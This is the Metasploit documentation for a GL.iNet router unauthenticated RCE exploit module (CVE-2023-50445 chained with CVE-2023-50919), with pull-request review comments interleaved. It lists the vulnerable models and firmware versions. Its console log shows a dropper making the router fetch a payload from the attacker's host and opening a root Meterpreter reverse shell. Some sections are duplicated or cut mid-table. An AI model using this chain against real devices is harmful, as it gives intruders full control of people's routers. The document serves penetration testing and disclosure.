GL.iNet unauthenticated RCE [CVE-2023-50445] (#18648)
rapid7/metasploit-framework: documentation/modules/exploit/linux/http/glinet_unauth_rce_cve_2023_50445.md

## Vulnerable Application
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute
arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log` interface in the `logread` module.
This exploit requires post-authentication using the `AdminToken` cookie / session ID (`SID`), typically stolen by the attacker.

However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a `Lua`
string pattern matching and SQL injection vulnerability.
The `AdminToken` cookie / `SID` can be retrieved without knowing a valid username and password.

The following GL.iNet network products are vulnerable:

>  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
>  - MT6000 => v4.5.0 - v4.5.3;
>  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
>  - E750/E750V2, MV1000 => v4.3.8;
>  - and potentially others (just try ;-)

Reviewer: ```suggestion
 - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
 - MT6000: v4.5.0 - v4.5.3;
 - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
 - E750/E750V2, MV1000: v4.3.8;
 - and potentially others (just try ;-)
```

This confused me I thought E750/E750V2, MV1000 => v4.3.8" meant "E750/E750V2, MV1000 with a version equal or superior to v4.3.8"

Author: yes, agree. see https://github.com/rapid7/metasploit-framework/pull/18648/commits/9bb7e0e37930022e97f801e22ad8dd1f864b061b

## Installation
Ideally, to test this module, you would need a vulnerable GL.iNet device.
However, by downloading the firmware and install and use `FirmAE` to emulate the router,
we can simulate the router and test the vulnerable endpoint.

> This module has been tested on:
> - [x] FirmAE running on Kali Linux 2023.11
> * GL.iNet Router model AR300M with  firmware v4.3.7
> * GL.iNet Router model AR300M16 with  firmware v4.3.7
> * GL.iNet Router model MT300N-V2 with  firmware v4.3.7
> * GL.iNet Router model MT1300 with  firmware v4.3.7

Reviewer: ```suggestion
This module has been tested via FirmAE running on Kali Linux 2023.11 on the following things:
* GL.iNet Router model AR300M with  firmware v4.3.7
* GL.iNet Router model AR300M16 with  firmware v4.3.7
* GL.iNet Router model MT300N-V2 with  firmware v4.3.7
* GL.iNet Router model MT1300 with  firmware v4.3.7
```

Author: See https://github.com/rapid7/metasploit-framework/pull/18648/commits/9bb7e0e37930022e97f801e22ad8dd1f864b061b.

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen o
                                      n all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
  to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
  interface in the `logread` module.
  This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
  by the attacker.
  However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
  through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
  retrieved without knowing a valid username and password.

  The following GL.iNet network products are vulnerable:

>   - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A => v4.0.0 < v4.5.0;
>   - MT6000 => v4.5.0 - v4.5.3;
>   - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300 => v4.3.7;
>   - E750/E750V2, MV1000 => v4.3.8;
>   - and potentially others (just try ;-)

Reviewer: ```suggestion
  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
  - MT6000: v4.5.0 - v4.5.3;
  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
  - E750/E750V2, MV1000: v4.3.8;
  - and potentially others (just try ;-)
```

Author: See https://github.com/rapid7/metasploit-framework/pull/18648/commits/9bb7e0e37930022e97f801e22ad8dd1f864b061b.

                                      n all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
  to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
  interface in the `logread` module.
  This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
  by the attacker.
  However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
  through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
  retrieved without knowing a valid username and password.

  The following GL.iNet network products are vulnerable:
  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
  - MT6000: v4.5.0 - v4.5.3;
  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
  - E750/E750V2, MV1000: v4.3.8;
  - X3000: v4.0.0 - v4.4.2;
  - XE3000: v4.0.0 - v4.4.3;
  - SFT1200: v4.3.6;
  - and potentially others (just try ;-)

>   NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads

Reviewer 2: ```suggestion
  NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
```

```shell
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 1
target => 1
msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit

[*] Started reverse TCP handler on 192.168.8.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.8.1:80 can be exploited.
[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
[*] SID: Gs2KPnIsIQQUzHQkEBVN8JOcq5nV008e
[*] Executing Linux Dropper for linux/mipsbe/meterpreter_reverse_tcp
[*] Using URL: http://192.168.8.2:1981/OrfVHM15cua0w
[*] Client 192.168.8.1 (curl/7.88.1) requested /OrfVHM15cua0w
[*] Sending payload to 192.168.8.1 (curl/7.88.1)
[*] Meterpreter session 9 opened (192.168.8.2:4444 -> 192.168.8.1:48511) at 2024-01-03 08:30:52 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.8.1
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > 
```

## Limitations

> Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.

Reviewer 2: ```suggestion
Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads when using the Linux Dropper target.
```
